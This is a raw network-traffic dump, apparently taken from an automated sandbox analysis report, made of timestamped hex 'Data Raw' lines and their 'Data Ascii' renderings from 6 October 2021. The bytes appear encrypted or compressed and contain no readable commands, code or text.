                                                          2021-10-06 16:03:54 UTC79INData Raw: 97 16 ed 72 d4 bf 3e 02 0a ce d4 cb 46 c9 21 2f 4a ae 82 26 06 55 b8 b1 18 bc 73 be bc 8b d1 ef 65 72 2b 94 95 1e a9 91 be 3c 91 6e 9c 30 31 13 74 a5 dc 3f d9 ec e9 32 5b 59 2d 39 79 65 89 a8 52 5a 44 0f 21 c9 ba 41 88 c2 9b 1a 3f 23 09 a5 2e 85 79 12 49 4d 0b 37 e5 21 44 8c 25 ca 3e dc bf 2a 5e 59 27 77 05 2a 18 15 23 ab d1 9a 8a f2 b8 92 02 4e 2a b9 9c 4a 4d 2b 94 2f 12 1b 2c e3 11 5a 9b c9 62 72 2d 21 b9 46 3f 39 df b1 23 c5 4f 9a b9 5d e5 e4 83 6d 02 01 3e c4 31 ab d1 25 eb 85 80 c3 01 e3 4c b3 4a 67 41 9e 3b 50 3c 4f 49 bf 8b 48 98 f0 e5 fb 24 08 7c a4 4f a6 ce 9b 34 c5 92 17 4f 47 62 06 2e 37 f8 ce a1 dd e4 3f 53 d4 7e 28 93 ba f2 da 0c 81 15 3e 6a 77 74 3f 62 56 78 dd 46 ef 68 89 e1 21 03 e7 0d 71 3e 8d b8 cc 78 fe 33 3c 79 52 06 ff ab b0 12 ca 61
                                                          Data Ascii: r>F!/J&User+<n01t?2[Y-9yeRZD!A?#.yIM7!D%>*^Y'w*#N*JM+/,Zbr-!F?9#O]m>1%LJgA;P<OIH$|O4OGb.7?S~(>jwt?bVxFh!q>x3<yRa
                                                          2021-10-06 16:03:54 UTC80INData Raw: 67 ba 59 93 24 f8 5c d7 e7 7d 15 c5 e8 4d 06 45 15 4e f8 9b e0 35 40 ac 32 83 2c 52 bf 68 8f f8 52 43 63 93 bc f0 36 89 56 6c 76 f7 3e 4c 78 e1 2a b5 57 d6 2f d8 3f 74 6e fc 96 6b ff f7 3f a6 23 e9 63 34 e3 55 28 3c 24 fc 7d 60 f2 53 6f b5 2b 16 d1 b8 1d 98 76 09 1e 69 b5 20 1c fe a7 4c a4 16 94 48 b3 5e 16 01 8a 20 31 5b 15 ad 66 f0 f1 33 e6 c2 45 07 d1 7f 37 89 02 ea 7f 2b 43 3e f3 93 4b d9 ce 4f d8 ef 70 4f a0 77 6b 45 2a 0c f9 9e b0 3f 24 e7 9b 65 87 78 69 98 86 35 7c a5 42 5c f3 7f 4f 4e 3a 65 3d 57 7c ef 15 65 b9 50 9b ce dc fa 59 e0 d1 3f 13 0d af 48 ca 28 03 f2 10 55 c8 83 48 2f 38 ed d0 e5 48 e3 a2 18 f8 3c d7 89 fa 2f 2a 98 81 c5 e3 3e 9b f1 2d 28 83 f6 7d af e8 2f f8 8d 78 3b 21 60 9e 30 00 31 08 26 78 44 c1 e9 ff 54 9e 7b 97 46 d0 43 3e 5b 7f
                                                          Data Ascii: gY$\}MEN5@2,RhRCc6Vlv>Lx*W/?tnk?#c4U(<$}`So+vi LH^ 1[f3E7+C>KOpOwkE*?$exi5|B\ON:e=W|ePY?H(UH/8H</*>-(}/x;!`01&xDT{FC>[
                                                          2021-10-06 16:03:54 UTC81INData Raw: e8 88 ab 7a 1a 55 1b 33 8e 31 43 88 c2 e3 c1 01 23 0f 8e 18 3d 49 10 43 4d 51 37 e5 23 4f 93 3d cf 3e f7 b5 21 41 b0 d8 5a 23 2a 28 8b 23 ac cd 68 92 cd b1 85 18 45 32 b0 9c 4a 4d 24 ae 25 28 f2 10 c2 94 a5 64 d2 5a 43 24 22 d5 36 29 c7 da b7 20 d2 5c 82 89 4e ee d3 91 93 03 25 3c ef 25 85 fe f0 0f 7a 8e fe ff e2 73 81 57 6c 08 99 2d ae 96 63 4b b9 96 44 b4 d9 1b f2 1f f4 56 8a 66 5d c0 e0 40 dd 6c 12 49 6a 62 7b f5 4b f8 ca b3 df 76 3e 53 cd 45 33 9f 92 fa cc f2 88 39 3c 6c 6d 7f 1c 60 a8 7e e6 ba c5 46 a0 34 02 94 e0 1b 85 38 bb bd 55 c4 e4 ee 4b 92 52 2a f7 aa b2 39 29 70 13 75 fb 98 9f 99 ed fd c6 30 4e eb d2 17 f7 f9 3e 97 57 3a 7c de 18 0d cf e7 7c 03 8f 40 72 e9 3f 3d b6 cd d1 dd 09 65 ce 1d bb 4d d3 cb a1 24 b4 23 01 f7 b4 85 69 55 3d 5c a3 81 4a
                                                          Data Ascii: zU31C#=ICMQ7#O=>!AZ#*(#hE2JM$%(dZC$"6) \N%<%zsWl-cKDVf]@lIjb{Kv>SE39<lm`~F48UKR*9)pu0N>W:||@r?=eM$#iU=\J
                                                          2021-10-06 16:03:54 UTC82INData Raw: 6a b3 49 e9 e4 79 ff 44 9f 95 cb c2 dc 93 2c 0e f6 2e 52 58 07 e6 ad 6e 06 ca 54 87 53 b8 dc 34 9a c0 4e c9 c0 f8 59 7b 21 53 c5 49 c6 e6 fd 7f 0b 98 1e ad 98 00 d8 16 d4 93 3c 08 63 ff 08 64 42 cb 4e 6e 58 a9 f7 99 2e 6a b7 ba 0f d4 48 ad aa 92 ae ad 75 1d e4 96 fa 56 bb 83 93 21 a8 3f 88 20 58 9d 5d a7 d6 26 bd be fa 39 75 6d 40 7b 72 0a 43 ab 7a 11 50 1f 30 70 81 53 99 d8 e5 5f 0c ff 7c 33 30 96 43 1d 5f 62 64 00 e7 29 4e 9b ee cf 26 e4 a8 12 b6 4e d9 76 2e 39 0c 71 17 ae c7 6e a3 63 be 85 0f 58 05 8f 62 4b 6b 3f 8c 26 30 d0 90 9c 6a 5c f4 01 48 50 25 25 d5 31 50 0d d9 9b 29 ed f0 8d 89 59 f3 e4 ad 6d 02 03 28 f7 2b b4 f2 ce f4 85 81 bb 33 e2 60 bb 55 7d 4d f6 19 ac 3d 69 63 69 84 48 99 fe 33 d4 08 0a 5d b0 57 4e c5 c8 8a c1 92 15 0a a9 60 05 59 4c e9
                                                          Data Ascii: jIyD,.RXnTS4NY{!SI<cdBNnX.jHuV!? X]&9um@{rCzP0pS_|30C_bd)N&Nv.9qncXbKk?&0j\HP%%1P)Ym(+3`U}M=iciH3]WN`YL
                                                          2021-10-06 16:03:54 UTC83INData Raw: 84 94 7f ca 1e ec 24 a3 ea 8e c6 fe cc ab 1e 68 3c a5 b2 cf c3 61 ee 81 3a cd 20 9b b9 14 6f 19 ae c6 c4 b4 60 57 99 ca 58 7c aa c5 dd ff e1 ea f4 b0 ec 82 67 2f 49 72 3d f4 ee c0 ea 7d 80 df 09 55 35 3e a2 4a cc 05 c7 cc 96 a7 35 17 1b d2 a7 69 16 4e 54 4f 4f 8a b3 df 31 96 4b c0 37 6b 29 45 75 f7 07 cc 51 c9 30 f8 c3 7d 79 02 0b 41 e3 cf 33 d4 bf fe 75 0b 02 40 98 0a 2a da 4a 60 cd 53 6f 28 3b 21 03 99 f8 92 4f cd 82 6f aa 15 06 a3 39 31 7d 33 8b 0a 2c c9 16 58 ca 99 31 4c 0f 9c 6e 0a f0 33 ec 74 5c 11 ea 56 b9 98 0b f3 1d 2c 70 1c cd e0 60 d9 ce d2 cd f5 40 7c 7f 77 7a 4c ac f4 e7 99 9d dc 27 3d 17 c6 81 67 44 94 a5 b2 69 b3 6f 52 8f f8 b7 50 38 7c b7 5b 7f d3 3c ee a8 59 87 ac db c9 46 ee 9c b5 99 2d 9e 5e 57 38 34 fb 32 89 c2 92 4c ac 37 7e dc fa 47
                                                          Data Ascii: $h<a: o`WX|g/Ir=}U5>J5iNTOO1K7k)EuQ0}yA3u@*J`So(;!Oo91}3,X1Ln3t\V,p`@|wzL'=gDioRP8|[<YF-^W842L7~G
                                                          2021-10-06 16:03:54 UTC84INData Raw: 71 ba 4a 41 cb 48 e1 74 ae 84 24 3d 62 a2 a4 0d dc 5b ad b3 9b 40 bd 48 77 3b 9a e1 4f a7 91 a9 30 a6 02 67 31 1b 3f 5e dc 15 35 b6 bd e0 23 59 8d cd 50 78 65 8d 83 33 19 41 05 25 dd 54 43 88 cc f2 3e 00 21 0f 85 21 93 3a 54 4b 65 01 1f a3 2b 44 86 1c 9b 37 f7 ae 23 4f d8 6e 19 3c 29 00 14 5e 7e c7 64 8f c1 97 96 06 4e 3c ae 7d 6d 9f 28 93 6e 3b 83 e7 98 6a 5e 93 dc 4c 86 a0 09 c4 3d 3d 11 9c 9a 23 cf 4d f2 4f 5f e5 c8 85 1e 3c 0b 3e ce 31 b8 a9 4a f2 85 8d fc b9 e0 60 bb 7a 2b 43 99 27 a7 2b f5 fc c7 95 49 9f e2 66 28 08 0a 53 b9 43 56 c3 e0 59 ca 8d 0b 9b 64 4c 02 45 58 f1 d1 bc e4 eb 3f 42 c8 51 3a 6d 93 de cf 0e 8f 91 2f 73 49 25 14 79 5c 10 48 b9 ee 42 98 fe 35 12 f3 14 8f 2e ae a5 f9 8d ff 18 31 8e 42 23 ff fb 78 39 29 67 2a 61 f2 fb 28 08 83 ce d9
                                                          Data Ascii: qJAHt$=b[@Hw;O0g1?^5#YPxe3A%TC>!!:TKe+D7#On<)^~dN<}m(n;j^L==#MO_<>1J`z+C'+If(SCVYdLEX?BQ:m/sI%y\HB5.1B#x9)g*a(
                                                          2021-10-06 16:03:54 UTC86INData Raw: 54 77 c2 db 17 1b 47 40 48 e7 85 c8 ca 44 7a bd 34 2a 4d a6 5f d4 65 54 56 7d f7 75 6c 30 92 4d 00 09 69 38 59 77 fb 4c 6d 53 c9 3a d0 94 76 6e f6 22 2a e2 d7 2a d4 a9 79 cb 7a e9 40 b4 30 46 0c 5d ec f6 4c 45 3a 22 09 e3 97 e7 91 88 08 ae 7d a8 03 14 63 b6 61 bb 33 89 73 e6 58 09 23 8a 27 be 52 0a 9b 49 2e fd cd e7 72 72 1a fa 2c 87 8b 02 e0 fd 47 2f 53 d1 6d 41 f1 88 d1 de fa 4b 6b 6e af 18 04 b4 0a ec 9d d6 da 24 ed b3 be 83 67 4f 9f ce 2d 7b ba 69 49 99 ee 5a 5e 14 68 ae 4e 2f 3e 34 c2 f5 52 99 51 a9 db 6b ff 92 bd 7f 61 da 5c 56 24 34 86 32 89 c2 ab 0f b1 3e f8 f9 95 c3 7e a4 01 bf 1d e5 15 f6 4e 20 ba 21 cf cb 7e 05 f7 38 1c d8 af 7d af ec c0 bf 90 4f 11 f4 22 9c 30 96 1f 54 1c 67 47 32 6a e1 6d b8 e1 da 55 df df 29 4b 5a 57 c7 e4 79 3d 04 07 8d db
                                                          Data Ascii: TwG@HDz4*M_eTV}ul0Mi8YwLmS:vn"**yz@0F]LE:"}ca3sX#'RI.rr,G/SmAKkn$gO-{iIZ^hN/>4RQka\V$42>~N !~8}O"0TgG2jmU)KZWy=
                                                          2021-10-06 16:03:54 UTC87INData Raw: b8 58 b8 cf f4 3c 39 23 0f 39 30 96 58 12 32 a3 0b 37 e1 2a c0 1d 2b d1 75 b3 a2 2a 59 4c da 05 17 2a 00 14 3a c6 b4 20 89 de b0 ad 4f 4c 2d ab 4a 0c 63 29 b5 35 56 7c 2f 98 6c 29 a5 cf 48 5a 51 1d c6 3d 35 11 9b 99 23 cf c3 69 89 5f e4 c0 95 60 00 72 f5 c4 20 b9 f6 4b f2 fe 4c d4 ff e6 ee 06 5f 6e 43 e2 e6 ae 3d 67 3f 29 80 48 9e ea 60 31 08 0a 53 28 d3 c9 f3 e0 48 c4 9a 3b 56 64 60 0f 7b 11 f8 ce af e0 32 b2 79 c7 4e 28 bb da f0 da 06 fd 36 3e 7b 7a 02 df 79 56 7b e1 ab ec 4c a3 a3 2a 03 ea 0c 59 b2 8b ba db 71 83 ff 24 87 57 3c f5 a8 e8 39 29 69 30 61 e8 6b a7 08 e8 51 c6 32 5c 8e e1 3e b4 f3 29 e5 da 7f 52 db 16 31 d8 fc 71 09 97 51 94 30 60 7e ac c0 db fc 55 99 cf 3b 97 1c fb d0 a6 3c d2 be fe f6 9e 84 68 0e 32 5e a3 81 78 6d d9 15 8b 9e 3e ca 96 fd
                                                          Data Ascii: X<9#90X27*+u*YL*: OL-Jc)5V|/l)HZQ=5#i_`r KL_nC=g?)H`1S(H;Vd`{2yN(6>{zyV{L*Yq$W<9)i0akQ2\>)R1qQ0`~U;<h2^xm>
                                                          2021-10-06 16:03:54 UTC88INData Raw: b9 3b 3b de 5f 97 39 53 6f 2d 24 18 f4 4e 77 b2 76 09 80 14 7a 04 03 b1 2a 47 93 7a 89 0e 25 5a 72 e1 95 2d a9 5a 79 b4 44 31 fb 22 ee 2d 07 1a f9 55 91 cf 00 ea e9 3c 58 64 92 6f 4b d3 e6 95 dc f0 50 47 31 75 6b 4f a7 0f f7 b8 1f f1 24 e7 99 82 4c 67 45 83 16 c6 6f bb 6f 49 24 db e6 51 14 79 a3 2a a8 c0 35 ea b0 41 9d 84 55 cf 69 ff 9a d8 c5 12 9e 5a 47 23 34 87 31 89 c2 81 33 75 3e f2 e7 fd 34 41 a6 07 c6 32 ef 66 b8 32 1f b2 09 83 e1 3e 0d e6 36 6d e2 6a 7d a5 c0 f5 fc 92 45 33 9b 62 9e 3a 8d 32 06 13 e8 64 5d ef e2 16 73 fe 97 42 67 b0 2d 45 45 79 9b ce 01 33 6e c5 97 e5 ca 70 61 7b f1 0a 73 09 a7 a6 17 15 b9 6f fd 55 24 b4 58 c7 4a dd ed ed af e4 be 2c 00 73 1e 9c 0a cc f2 f8 81 c5 64 b6 f1 f5 d4 ee ac 2e 4d 3c da ef 6b 06 d5 a1 50 17 33 1c b3 fc c5
                                                          Data Ascii: ;;_9So-$Nwvz*Gz%Zr-ZyD1"-U<XdoKPG1ukO$LgEooI$Qy*5AUiZG#413u>4A2f2>6mj}E3b:2d]sBg-EEy3npa{soU$XJ,sd.M<kP3
                                                          2021-10-06 16:03:54 UTC89INData Raw: cb 5f dd 28 22 c4 3c 2c 33 ca 91 35 ed 81 8d 89 59 47 dd 89 79 16 1d 16 67 20 bd d0 18 7c ba 87 d4 fe f4 48 40 53 6c 4b b5 2f 85 78 61 49 d3 4c 48 9f ec 6f 7b 08 0a 56 b7 60 52 1a 6d 5d c5 92 12 4d 2d 62 05 59 3f d9 ce a5 ec 99 f3 53 c7 4a 28 e8 5e f2 da 08 98 11 38 6a 65 e5 3c e5 56 7f c0 1a ff 40 9c 2f 39 07 f1 1f 9e 37 9f f7 25 8c 01 36 26 fc 9a 2a fd 84 b5 b6 02 63 23 72 80 b8 9f 99 e9 46 ac ea 5d 86 18 3c b4 fd 59 57 13 54 d6 da 1c 1f b4 ed 41 01 86 7d 8c e8 13 39 ae c0 c0 c2 18 b0 d4 31 b8 4c 07 d1 80 26 a5 31 ff f1 8e 71 6a 51 0e 4b a8 8b 60 11 4d 67 e3 9e 15 c2 95 5b 9a e9 7d 43 69 33 a5 d3 bc 2c 6f f2 81 b8 63 d7 54 0b eb fe 2f e1 74 b3 f0 8e ec 73 f8 b4 31 95 aa 58 56 38 af 73 7c 21 fc 47 21 2c c5 9f 2d 87 c2 be fd 13 5b 6c ec b8 c6 bb 00 0c 11
                                                          Data Ascii: _("<,35YGyg |H@SlK/xaILHo{V`Rm]M-bY?SJ(^8je<V@/97%6&*c#rF]<YWTA}91L&1qjQK`Mg[}Ci3,ocT/ts1XV8s|!G!,-[l
                                                          2021-10-06 16:03:54 UTC91INData Raw: d2 e6 6c dc f0 5c 79 60 64 78 57 a5 1b eb 95 90 d9 24 e7 88 ed 93 73 6d 11 a0 a9 7c a9 66 52 8d cb 98 55 14 7f b7 47 70 d4 27 fa a8 57 bb 52 db e5 69 ec 8b b1 06 3a 08 5f 56 28 0f c9 43 ab ca 83 4e a0 36 e3 eb eb 4b 10 8c 05 cc 25 f1 06 f9 26 0e b5 af 72 f4 e4 14 e2 21 10 88 7c 6c a2 f9 bd 6f 84 61 09 cd 65 89 e6 8f 32 06 10 70 9b 4e e1 f1 63 af eb a6 a0 c1 d2 4c c5 45 73 38 f4 50 26 cf 19 41 68 e5 79 70 7c 0f cd 5b 09 ad d0 7e c5 b9 74 ea 49 38 be 77 f3 75 df e7 f6 b3 83 da 69 02 79 7b 90 4e ce f4 e4 83 c4 03 e4 f5 e3 cf c1 64 9b 5a ec e1 be 7a 09 f4 99 44 01 2f 9c 0b ea eb e3 50 5f 63 fd 0e 87 05 18 23 0e 20 80 a4 e4 26 9d be 59 4b e3 cc f2 ff 44 84 84 b3 40 d3 84 f0 0b d1 11 5d 49 1b c1 52 5f 0d a5 c1 e8 75 b0 ca 1a a5 c8 66 11 d2 cb 5d 3f 04 55 bb dc
                                                          Data Ascii: l\y`dxW$sm|fRUGp'WRi:_V(CN6K%&r!|loae2pNcLEs8P&Ahyp|[~tI8wuiy{NdZzD/P_c# &YKD@]IR_uf]?U
                                                          2021-10-06 16:03:54 UTC92INData Raw: 60 ac 92 13 63 76 64 14 57 5d 06 cd ae f0 c8 28 7b 14 4a 2a 95 83 f6 56 77 89 15 3f 53 7a 7e 14 73 25 29 c8 b8 e4 3e 9a fc 00 03 e0 1b 9c 0f a4 ba 65 72 fe 34 e4 87 53 3b eb 93 b8 01 86 62 23 70 fb 7c 95 8e 13 50 ea 33 47 ee d5 3c a5 f3 2c 71 a8 17 55 f0 2e 05 8d f4 71 12 8c 48 9d 16 12 13 a5 d1 d8 c5 1b 01 dc 34 a0 49 ea da ac 35 b7 25 ef 08 99 a3 62 45 20 5d a3 8b 78 18 a0 6c cf 8d 34 df b5 46 99 be b9 52 6f 26 2c ea 21 13 6e e0 b1 bb 7c ae 47 01 eb e7 25 fe 6f 5b fa 89 bd 62 f9 b4 19 87 80 45 45 20 a5 74 74 d5 e5 95 24 14 ea 93 2d 9e d6 ac 03 03 7d 7f 11 bb 91 76 2b d3 0a f7 84 b0 40 c6 92 46 2d 44 a4 44 ad 54 68 1d 67 14 52 91 78 22 0c ca 29 b1 e2 ea 0d 00 cd 83 96 c9 01 6f a5 d1 c9 68 e4 75 22 1f 38 b5 c4 d1 7c 1e b0 d2 5f 94 f1 5d 86 c6 f9 5d 06 ca
                                                          Data Ascii: `cvdW]({J*Vw?Sz~s%)>er4S;b#p|P3G<,qU.qH4I5%bE ]xl4FRo&,!n|G%o[bEE tt$-}v+@F-DDThgRx")ohu"8|_]]
                                                          2021-10-06 16:03:54 UTC93INData Raw: 5f 17 c9 83 4e b1 45 2e e3 fa 43 69 3e 7c 2c 23 e7 11 93 58 1d b8 2b 1b ab 1b 2f c0 32 1e a9 7b 75 ac f9 bb d6 fd 4f 1b da 48 4b 34 9c 31 3f b1 66 4d 5b c9 f6 7e b9 d6 af 46 d0 d5 e6 67 60 5b 0e e5 55 3b 06 07 94 c5 cf 79 70 fd 0f 50 5d 09 a1 8c c3 c4 b9 69 df 52 3a b1 77 8c 74 df e7 39 be fd ca 51 84 72 14 b4 5a cc 89 2e 90 c1 13 79 44 e2 04 d1 30 3f 42 25 f9 90 a6 06 df b0 57 7d e2 93 9a f8 d4 cf db 4a 7f f8 64 54 94 07 28 7e 03 7d 73 7e 3f b9 68 23 96 e9 e4 d2 d3 0a 9f 91 a4 5d c8 bb f0 1c de 06 44 d5 0a f0 83 4f 11 a0 d3 af f0 b2 ca 16 9c 5c 4e c3 dc da 57 44 06 e9 b9 da c0 f0 7a 6e 23 b6 1f b9 86 02 c3 be fc bd 34 20 3f f5 d5 c1 51 c6 3a 5f 4b ae 86 27 55 b3 bd b1 1a fb 2e bc bc 87 ad b6 4f 35 3c 90 eb 50 bc b9 6e 3b b9 28 8f bd 30 7c 5c a6 c8 21 a2
                                                          Data Ascii: _NE.Ci>|,#X+/2{uOHK41?fM[~Fg`[U;ypP]iR:wt9QrZ.yD0?B%W}JdT(~}s~?h#]DO\NWDzn#4 ?Q:_K'U.O5<Pn;(0|\!
                                                          2021-10-06 16:03:54 UTC95INData Raw: 38 6e 0b cc f9 6d 99 82 82 3a c4 30 55 d1 e9 3a a5 f7 58 bb ab 3b 5a ca 10 0e 48 91 79 02 86 5d e3 82 11 3f a4 cc c0 df 3b b5 cc 31 b9 34 95 d2 ac 2e 9b 2b f4 f0 89 81 04 49 0e 5c a9 e4 0b 0b b3 6c e9 b7 18 d1 b3 90 e9 92 b6 45 44 2a 3a 6f be 02 6c e1 b7 d4 0f a0 54 01 cd e7 24 e7 74 ab 94 91 b5 73 f5 cc a3 96 86 50 68 22 a1 63 b3 cc f3 7a 2b 29 f6 bb 70 78 3a 59 0b 3f 47 70 e4 92 66 74 00 0a 7a 92 95 ba 4a f1 89 52 29 b0 b1 40 1a 5e 79 1e ff 2e 83 9d 67 35 0b d4 3d 88 4b f5 00 f4 e4 be 90 df 07 1f c6 c0 c3 62 d3 6e 30 c9 1d 9a c2 d4 00 75 a8 c1 5f b2 ee 52 88 c1 68 8e 2a c5 d7 ae c1 f6 b5 b6 f9 8b 47 9d 5e 8c 3c 8c c7 d3 e3 62 d9 97 ff 7c 96 3d 89 42 cb d3 d1 df 57 36 21 0f 29 5c b4 26 d1 74 4b 66 10 e2 b1 6c 3a 85 44 62 38 7e 03 e0 66 fe 3f 38 41 d8 3f
                                                          Data Ascii: 8nm:0U:X;ZHy]?;14.+I\lED*:olT$tsPh"cz+)px:Y?GpftzJR)@^y.g5=Kbn0u_Rh*G^<b|=BW6!)\&tKfl:Db8~f?8A?
                                                          2021-10-06 16:03:54 UTC96INData Raw: 4c 41 53 c6 1a 55 31 24 05 bf cb cc 79 76 0e 70 84 59 03 dd a6 6f b8 66 6f f9 40 2b b2 22 54 74 df e9 cd be ec de 58 01 73 51 b4 4c ce f2 f2 90 c1 15 f4 f7 dd 6c c7 ea 2a 48 1e 7d a9 69 0c f3 bb 7d 28 3c 93 9c 8f e3 c6 41 53 08 f4 1b a0 1b 06 2c 65 24 61 8d ca 2e b5 6c 2b 6d eb e4 dc 85 46 99 ea 54 51 dc 97 24 1d d0 04 7a 20 0d f0 85 33 e7 b4 c7 83 79 b2 ca 1c a7 f0 4a c3 1c cb 5b 50 2e 57 bb da c4 ce e0 69 23 bc 1c bb ef fa eb 1d f8 bf 28 75 88 f5 d5 cf 42 c8 33 88 4b ae 80 27 2a 17 5b b1 1e d7 59 9c bc c1 bf bc e9 59 2d 96 fb 21 4f 91 b8 3b bb 5d ea 32 37 76 21 44 dc 35 b2 bb 93 d1 5d 5b 46 79 17 2a 8e ab 70 19 32 7c 25 a6 98 3e 6c c8 f4 49 3c 58 eb 8f 30 92 4b 7f 06 64 0b 3d e7 52 a7 8c 34 d8 37 8c 43 2a 59 4a cf 74 52 cf 00 1e 27 22 70 0b ff dc ba 8f
                                                          Data Ascii: LASU1$yvpYofo@+"TtXsQLl*H}i}(<AS,e$a.l+mFTQ$z 3yJ[P.Wi#(uB3K'*[YY-!O;]27v!D5][Fy*p2|%>lI<X0Kd=R47C*YJtR'"p
                                                          2021-10-06 16:03:54 UTC97INData Raw: 75 66 25 b9 60 c8 e1 d5 c0 be bc 83 81 b3 43 78 32 34 6d 68 2d 43 eb b8 d4 1e a0 54 01 f4 fc 3c e4 65 b4 fe b8 49 72 d3 aa c7 fb fb 58 4e 39 b1 67 60 df ec 6e 3d c6 ee a9 2d 85 c6 d5 b7 13 77 67 e5 a3 ae 75 00 1d 10 e5 69 bb 6c dd 9f 5f 45 51 a5 68 a2 40 6a 1d e9 b2 81 8b 99 35 33 c3 3e b3 ed f5 11 fb d3 a5 6e de 21 72 80 c7 fb 47 0a 80 c4 cb 27 9b d9 e2 6d 19 91 c1 55 94 2d 57 99 db 13 57 3e cf de f9 bb 65 f3 9a f1 9c 63 34 5b a4 72 d9 ec dd f6 79 83 ef f0 52 6d ab 89 48 e6 ab c3 f3 3e ae 32 15 3c d7 af a9 ce 41 7c 6b 7f 8c b9 61 18 ae 4b 73 3d b5 38 54 4c fe 3e 39 51 c9 30 f8 f2 74 65 d7 0a 63 75 d7 20 dc 55 ed 54 02 fc 41 be 38 2d a3 57 ed f2 57 6d 3f 50 02 f3 98 fc 9a 05 76 80 6f a0 79 0f b4 3b 4e b9 4d 18 0e 2f 52 74 28 94 2d a9 5f 1e f7 56 30 f1 37
                                                          Data Ascii: uf%`Cx24mh-CT<eIrXN9g`n=-wguil_EQh@j53>n!rG'mU-WW>ec4[ryRmH>2<A|kaKs=8TL>9Q0tecu UTA8-WWm?Pvoy;NM/Rt(-_V07
                                                          2021-10-06 16:03:54 UTC98INData Raw: 4b f2 b3 aa f6 e4 3b 48 cb 4e 22 8f 6c f3 f6 05 8e 16 43 74 60 7f 10 64 5a 7f c2 a1 10 45 a7 f3 29 2b 6f 1a 8f 35 8d 52 c1 7f fe 3c 39 79 52 06 f4 87 b0 44 27 62 23 74 e5 61 9f 91 f6 af c7 1c 5b d6 31 20 b8 f9 3f 90 a0 c5 51 f7 16 1e 9a 83 62 02 86 53 93 e2 1f 3f a6 d6 2f d5 3f 99 d8 3d bf 53 e6 da 52 25 91 38 d4 f3 a0 d2 94 82 f3 5b 89 98 57 0a b3 c7 cf 9c 3e 11 be b8 89 84 a5 47 51 a5 2b 64 96 2c 7e e5 ad 45 62 8e 58 09 f2 f0 5c b8 65 a5 f1 a9 aa 60 fb a3 de 90 9c a4 4f 1f aa 5f 8f c4 ee 6f 25 29 eb 98 d8 86 e9 aa 0b 11 61 49 2c bb bd 76 0d 12 06 fa 97 ab 44 ce 66 58 14 bf b2 62 bc 4f 7d 18 f8 a7 9c 63 66 18 18 c3 3e 93 fe ec 13 fa cc be 94 c8 f3 71 87 c1 db 7b f1 7f 2a e5 22 67 c3 fe 6a 00 a0 dd 46 90 e0 46 9d d4 f9 5d 06 ce d4 fd b2 ff f2 9a f4 90 6e
                                                          Data Ascii: K;HN"lCt`dZE)+o5R<9yRD'b#ta[1 ?QbS?/?=SR%8[W>GQ+d,~EbX\e`O_o%)aI,vDfXbO}cf>q{*"gjFF]n
                                                          2021-10-06 16:03:54 UTC99INData Raw: f2 28 f6 a6 07 c6 4c 36 14 fc 36 00 b3 32 c0 e3 2f 02 e8 27 e0 a2 44 72 ad 93 bd ff 92 4b 74 76 60 9e 3a 83 21 04 1b 67 5c 58 f0 f0 93 bf d2 9e 7e bc df 38 44 5a 62 2a e0 55 20 10 11 86 1b cf 55 60 7f 20 eb dc 0f c9 21 03 16 b8 6f ff 5b 3b a5 5a b4 65 da f0 19 bf c0 d9 7e 00 08 18 b5 4c ca 9d 78 92 c1 1d e0 29 e6 da ca f4 3f 48 36 e3 ad 76 15 21 b1 79 0a 3c e8 89 fd c5 c0 6c 10 6d ee 0c 8d 94 16 29 70 06 94 a4 c8 20 b7 11 48 4a e9 e0 fa 51 5b 81 84 b0 51 cd 96 39 0a 20 01 7e 54 0f 8b 8d 4f 05 b0 eb 98 4c a1 d9 19 b4 d1 4b d5 28 ca 77 53 39 44 be da d7 e3 e8 7e dd b7 32 af b9 13 d3 f4 01 42 c1 22 76 c5 d0 cb 45 c9 4e 6d 93 ae 84 34 2c 11 ad b0 1e d7 76 b7 94 40 ba bc 62 01 ae 94 fa 56 d2 e2 c7 3d b9 24 95 26 3d 44 89 a6 dc 35 b4 c2 f8 33 5d 5f 44 53 6b 64
                                                          Data Ascii: (L662/'DrKtv`:!g\X~8DZb*U U` !o[;Ze~Lx)?H6v!y<lm)p HJQ[Q9 ~TOLK(wS9D~2B"vENm4,v@bV=$&=D53]_DSkd
                                                          2021-10-06 16:03:54 UTC100INData Raw: 00 d1 3b 81 ec db 28 e5 ef 3c 51 a3 33 7c dd 14 76 c9 fe 71 09 5a 50 a6 e8 12 2f ae c0 d3 d4 15 9b d2 12 bf 51 f9 d0 ac 24 a6 0a fa f6 9f 8e 6b 7d d0 5c a3 9a 65 59 c8 68 ce 9c 3a b5 82 b8 98 93 9b 48 41 19 29 64 90 5f ec e3 b1 b1 19 a0 04 64 22 f7 2f e7 6f 8d 68 a7 b7 79 f2 8b 5c 96 86 50 42 3a d1 e7 65 df f7 43 e5 39 ef 83 35 83 c3 c9 97 10 77 6b fc bc 96 4d 12 0a 3d 6b 95 ba 4a c4 9d 5a 29 bf ca fe a4 5c 73 35 c3 a1 d4 8c 62 3c 70 0a 28 a0 ee d9 1e ef c8 be 95 a4 14 71 ab c6 cb 79 f0 04 21 e0 39 9d d3 d7 14 3d ab c1 51 fb 24 56 99 cc 21 4e 2c ed 4a fd cf f8 de 20 2e 81 75 20 a1 9a 1b d8 ec cc 88 2a 89 c3 fd 88 1b 6c e6 80 e6 81 c6 ca 44 c3 fa 1e 2a 4b a6 27 bb 69 55 5c 7b a4 8a 6c 30 9c 42 71 67 10 35 52 66 fa 17 b1 53 c9 3a fa d0 24 15 f1 0b 6d e4 d5
                                                          Data Ascii: ;(<Q3|vqZP/Q$k}\eYh:HA)d_d"/ohy\PB:eC95wkM=kJZ)\s5b<p(qy!9=Q$V!N,J .u *lD*K'iU\{l0Bqg5RfS:$m
                                                          2021-10-06 16:03:54 UTC102INData Raw: 0b f4 cb 6f 6e 12 8e 85 59 03 b8 ae 7f c3 b9 7e ff 5b 3d 48 5e 98 6e dd 96 e9 bf ec c9 6f 8c c4 a2 9c d5 cc f2 f8 86 d9 78 5e f3 f5 d4 d9 ff 3f 4b 36 e3 ae 76 10 21 b1 79 1c 3c e8 94 fd c5 c0 47 d7 c5 4c 37 11 96 07 26 79 10 05 0c e4 2c bf 75 4f 58 ef e4 c7 f9 5b 83 69 b4 7d db 85 35 1c c1 0e 41 5e 0d e1 85 56 fb b5 eb 8c 50 c9 ef 1d b4 c4 62 dc cf d8 5d 50 3f 51 a4 d1 38 e7 db 62 03 b6 16 ad 92 05 ef 02 f0 ae 38 08 74 f3 ce 35 41 e7 47 13 5e af 84 21 22 76 ae b7 1e c2 5d a3 b0 7f bf 90 6d 4a 4c 94 fa 5c b7 9c ab 39 b9 3f 9f 29 c9 7d 70 ae f4 a2 b6 b9 e2 3e 47 48 44 7b 69 63 90 a4 